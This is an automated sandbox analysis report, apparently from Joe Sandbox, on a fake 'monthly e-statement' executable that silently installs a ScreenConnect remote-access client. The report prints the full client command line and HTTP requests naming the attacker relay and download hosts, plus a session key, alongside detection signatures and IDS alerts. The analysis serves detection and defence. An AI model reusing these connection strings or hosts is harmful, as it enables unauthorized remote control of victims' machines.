Windows Analysis Report
monthly-eStatementForum120478962.Client.exe

Overview

General Information

Sample name:monthly-eStatementForum120478962.Client.exe
Analysis ID:1551950
MD5:27bd2490fd75556aab2df57ea7c1147f
SHA1:4eb9656ede1fed23fdaeb67815afcd489ded0f77
SHA256:7d6376247db9e267f27d1d6bf32b48afcab0ad277706fc0135d803645f7852a5

Detection

ScreenConnect Tool
Score:51
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Detected potential unwanted application
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • monthly-eStatementForum120478962.Client.exe (PID: 7160 cmdline: "C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe" MD5: 27BD2490FD75556AAB2DF57EA7C1147F)
    • dfsvc.exe (PID: 2628 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 7440 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe" MD5: 20AB8141D958A58AADE5E78671A719BF)
        • ScreenConnect.ClientService.exe (PID: 7484 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • WerFault.exe (PID: 7788 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7160 -s 332 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 6932 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 2120 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 7512 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 7580 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe" "RunRole" "c62c9dea-32aa-435a-858b-87f989247e7c" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • svchost.exe (PID: 7728 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7764 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7160 -ip 7160 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7844 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000007.00000000.1558755338.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000001.00000002.3157733053.000001E8B3FFF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000007.00000002.1569444555.000000000315F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Process Memory Space: dfsvc.exe PID: 2628 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7440 | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
7.0.ScreenConnect.WindowsClient.exe.e10000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

                  System Summary

                  Source: Network Connection Author: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.7, DestinationIsIpv6: false, DestinationPort: 49706, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 2628, Protocol: tcp, SourceIp: 194.59.30.201, SourceIsIpv6: false, SourcePort: 443
                  Source: Process started Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6932, ProcessName: svchost.exe

                  Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                  2024-11-08T11:09:35.005158+0100 | 2022930 | 1 | A Network Trojan was detected | 4.175.87.197 | 443 | 192.168.2.7 | 49772 | TCP
                  2024-11-08T11:10:13.054100+0100 | 2022930 | 1 | A Network Trojan was detected | 20.12.23.50 | 443 | 192.168.2.7 | 49993 | TCP
                  2024-11-08T11:09:27.640004+0100 | 2009897 | 1 | A Network Trojan was detected | 194.59.30.201 | 443 | 192.168.2.7 | 49730 | TCP
                  2024-11-08T11:09:29.098621+0100 | 2009897 | 1 | A Network Trojan was detected | 194.59.30.201 | 443 | 192.168.2.7 | 49737 | TCP
                  2024-11-08T11:09:34.163926+0100 | 2009897 | 1 | A Network Trojan was detected | 194.59.30.201 | 443 | 192.168.2.7 | 49771 | TCP
                  2024-11-08T11:09:35.536470+0100 | 2009897 | 1 | A Network Trojan was detected | 194.59.30.201 | 443 | 192.168.2.7 | 49779 | TCP
                  2024-11-08T11:09:37.158581+0100 | 2009897 | 1 | A Network Trojan was detected | 194.59.30.201 | 443 | 192.168.2.7 | 49790 | TCP
                  2024-11-08T11:09:38.514160+0100 | 2009897 | 1 | A Network Trojan was detected | 194.59.30.201 | 443 | 192.168.2.7 | 49798 | TCP
                  2024-11-08T11:09:41.447672+0100 | 2009897 | 1 | A Network Trojan was detected | 194.59.30.201 | 443 | 192.168.2.7 | 49814 | TCP
                  2024-11-08T11:09:43.298710+0100 | 2009897 | 1 | A Network Trojan was detected | 194.59.30.201 | 443 | 192.168.2.7 | 49825 | TCP

                  AV Detection

                  Source: Submitted Sample Integrated Neural Analysis Model: Matched 88.9% probability
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe Code function: 0_2_00F21000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00F21000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe

                  Compliance

                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe EXE: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe
                  Source: monthly-eStatementForum120478962.Client.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: monthly-eStatementForum120478962.Client.exe Static PE information: certificate valid
                  Source: unknown HTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49706 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49748 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49754 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49760 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49771 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49779 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49798 version: TLS 1.2
                  Source: unknown HTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49814 version: TLS 1.2
                  Source: monthly-eStatementForum120478962.Client.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B424A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4325000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EBB000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1569312203.0000000002F12000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: monthly-eStatementForum120478962.Client.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B435D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4246000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EB7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.1567594933.0000000002CD2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.3155817267.00000000029B0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.3156144988.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1558755338.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1563335386.0000000000C4D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EB3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4242000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4383000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1570550715.000000001C112000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1558755338.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EB3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4242000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4383000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1570550715.000000001C112000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B424A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4325000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EBB000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1569312203.0000000002F12000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EAB000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.1568117293.0000000005462000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe Code function: 0_2_00F24A4B FindFirstFileExA,0_2_00F24A4B

                  Networking

                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe Registry value created: NULL Service
                  Source: global traffic TCP traffic: 192.168.2.7:49851 -> 194.59.30.201:8041
                  Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip
                  Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip
                  Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip
                  Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip
                  Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip
                  Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip
                  Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip
                  Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip
                  Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip
                  Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip
                  Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip
                  Source: global traffic HTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1 Host: voicemail-lakeleft.top Accept-Encoding: gzip
                  Source: Joe Sandbox View IP Address: 194.59.30.201 194.59.30.201
                  Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.7:49737
                  Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.7:49771
                  Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.7:49730
                  Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.7:49798
                  Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.7:49772
                  Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.7:49790
                  Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.7:49814
                  Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.7:49825
                  Source: Network traffic Suricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.7:49779
                  Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.7:49993
                  Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global traffic DNS traffic detected: DNS query: voicemail-lakeleft.top
                  Source: global traffic DNS traffic detected: DNS query: time.windows.com
                  Source: global traffic DNS traffic detected: DNS query: popwee2.zapto.org
                  Source: monthly-eStatementForum120478962.Client.exe, 00000000.00000002.2255664157.000000000134C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256Time
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: monthly-eStatementForum120478962.Client.exe, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr, ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: dfsvc.exe, 00000001.00000002.3176665958.000001E8CDE7D000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                  Source: 57C8EDB95DF3F0AD4EE2DC2B8CFD41570.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab
                  Source: dfsvc.exe, 00000001.00000002.3176665958.000001E8CDE88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enD
                  Source: svchost.exe, 0000000E.00000003.1929317541.000002094ED7C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914328789.000002094ED78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200
                  Source: svchost.exe, 0000000E.00000003.1929317541.000002094ED7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecuri
                  Source: svchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: svchost.exe, 0000000E.00000002.3157558612.000002094ED10000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1837600169.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857195324.000002094ED08000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1836923942.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1874189629.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1836908409.000002094ED07000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1945573249.000002094ED0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1914239278.000002094ED0E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1890698251.000002094ED09000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 